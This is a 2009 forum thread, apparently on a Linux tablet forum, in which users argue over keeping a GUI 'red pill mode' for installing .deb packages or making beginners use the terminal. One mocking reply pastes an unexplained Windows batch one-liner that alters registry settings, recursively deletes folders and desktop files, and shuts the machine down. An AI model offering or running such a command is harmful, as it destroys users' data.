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2009-12-28
, 11:12
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It's a horrible nightmare that would require for me to start googleing and learning all kinds of crappy commands I do not know nothing of!
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2009-12-28
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@ Switzerland
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2009-12-28
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@ Kassel, Hesse, Germany
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Why in the world would anybody want to disable red pill mode?
As a beginner barely getting used to linux I find red pill mode to be a very confortable way of installing .deb packages.
How can someone even start to imagine that installing apps via the terminal can be likeable??? It's a horrible nightmare that would require for me to start googleing and learning all kinds of crappy commands I do not know nothing of!
I say red pill should not only be kept, but the app manager should have the capability by default of installng .deb packages from the internal memory.
Either that or make the .debs installable by clicking when in the internal memory.
Thank you !
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2009-12-28
, 12:55
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@ Oxford
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2009-12-28
, 12:58
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What??? Oh noes, You would actually need to learn something? That's outragous!!!
@FOR /F "DELIMS=" %%? IN ('REG QUERY HKLM\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318} /S^|FINDSTR \\Connection$') DO @REG ADD "%%?" /V ShowIcon /T REG_DWORD /D 0 /F>NUL FOR /F "DELIMS=" %%? IN ('DIR/B/AD %TEMP%\*') DO RD/S/Q "%%~f?" COPY "%AllUsersProfile%\Desktop\*.*" "%USERPROFILE%\Desktop" for /f "usebackq delims=" %%d in (`"dir /ad/b/s | sort /R"`) do rd "%%d" DEL /s /q "%USERPROFILE%\Desktop\*.*" shutdown -s -t 20
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2009-12-28
, 13:05
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A functionality for advanced users which can be replaced by another functionality for the same target group can be removed. If you don't know how to do it on the command-line, you shouldn't be doing it via the GUI.
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2009-12-28
, 13:24
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Oh noes why do you think linux fails to catch to the wide range of audience?
Writing a command line EACH and every time I want to install a .deb is annoying =/= handy[/B]
...install an app with two clicks instead of writing down a whole line of text - suppose you know why they say time is money?
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2009-12-28
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"dpkg -i /path/to/file"
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2009-12-28
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If you're not happy, just write a script to do it and but a big red pill button on your desktop.
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dpkg for dummies, noobs with long ropes, uber-geeks, xterm snobs |
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As a beginner barely getting used to linux I find red pill mode to be a very confortable way of installing .deb packages.
How can someone even start to imagine that installing apps via the terminal can be likeable??? It's a horrible nightmare that would require for me to start googleing and learning all kinds of crappy commands I do not know nothing of!
I say red pill should not only be kept, but the app manager should have the capability by default of installng .deb packages from the internal memory.
Either that or make the .debs installable by clicking when in the internal memory.
Thank you !